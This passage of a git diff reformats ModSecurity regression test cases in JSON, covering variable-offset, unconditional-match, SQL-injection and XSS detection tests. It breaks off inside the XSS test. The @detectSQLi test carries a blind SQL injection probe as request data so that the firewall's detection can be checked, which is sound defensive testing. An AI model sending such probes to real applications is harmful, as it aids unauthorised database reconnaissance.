"Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_SIZES 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1561,38 +1986,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"v560,32t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "v560,32t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_SIZES:filedata \"@gt 0\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_SIZES 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_SIZES 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1614,38 +2048,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"v754,38t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "v754,38t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_SIZES:fiasdfasdfledata \"@gt 0\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_COMBINED_SIZE", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_COMBINED_SIZE", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1667,38 +2110,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"v560,32v754,38t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "v560,32v754,38t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_COMBINED_SIZE \"@gt 0\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_TMP_CONTENT 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_TMP_CONTENT 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1720,10 +2172,19 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o8,7v754,38t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o8,7v754,38t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", @@ -1731,29 +2192,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_TMP_CONTENT 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_TMP_CONTENT 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1775,10 +2236,19 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o15,5v560,32t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o15,5v560,32t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", @@ -1786,29 +2256,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - PATH_INFO", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - PATH_INFO", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -1830,10 +2300,19 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,4v5,23t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,4v5,23t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", @@ -1841,29 +2320,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - MULTIPART_FILENAME", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - MULTIPART_FILENAME", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1885,10 +2364,19 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,20v680,20t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,20v680,20t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", @@ -1896,29 +2384,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - MULTIPART_NAME", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - MULTIPART_NAME", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1940,10 +2428,19 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,16v709,16t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,16v709,16t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", @@ -1951,63 +2448,85 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS n", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS n", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param01=5555&bbbbbbbmy_id=6", - "method":"GET" + "uri": "/index.html?param01=5555&bbbbbbbmy_id=6", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 403, - "error_log":"o0,1v42,1" + "expected": { + "error_log": "o0,1v42,1", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains 6\" \"id:1,phase:2,deny,status:403,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_NAMES n", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_NAMES n", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param01=5555&bbbbbbbmy_id=6", - "method":"GET" + "uri": "/index.html?param01=5555&bbbbbbbmy_id=6", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 403, - "error_log":"o7,5v29,12" + "expected": { + "error_log": "o7,5v29,12", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS_NAMES \"@contains my_id\" \"id:1,phase:2,deny,status:403,log\"" ] diff --git a/test/test-cases/regression/operator-UnconditionalMatch.json b/test/test-cases/regression/operator-UnconditionalMatch.json index 5f73a2ec2e..dcef558870 100644 --- a/test/test-cases/regression/operator-UnconditionalMatch.json +++ b/test/test-cases/regression/operator-UnconditionalMatch.json @@ -1,44 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Operator :: @UnconditionalMatch", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Operator :: @UnconditionalMatch", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Rule returned 1" + "expected": { + "debug_log": "Rule returned 1", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@UnconditionalMatch\" \"id:1,phase:2,pass,t:trim\"" ] diff --git a/test/test-cases/regression/operator-detectsqli.json b/test/test-cases/regression/operator-detectsqli.json index e2e33c908f..58dcb9505a 100644 --- a/test/test-cases/regression/operator-detectsqli.json +++ b/test/test-cases/regression/operator-detectsqli.json @@ -1,44 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Operator :: @detectSQLi", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Operator :: @detectSQLi", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=ascii(substring(version() from 1 for 1))¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Added DetectSQLi match TX.0: f\\(f\\(f" + "expected": { + "debug_log": "Added DetectSQLi match TX.0: f\\(f\\(f", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@detectSQLi\" \"id:1,phase:2,capture,pass,t:trim\"" ] diff --git a/test/test-cases/regression/operator-detectxss.json b/test/test-cases/regression/operator-detectxss.json index e2590193b0..4885c59845 100644 --- a/test/test-cases/regression/operator-detectxss.json +++ b/test/test-cases/regression/operator-detectxss.json @@ -1,44 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Operator :: @detectXSS", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Operator :: @detectXSS", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ - "param1=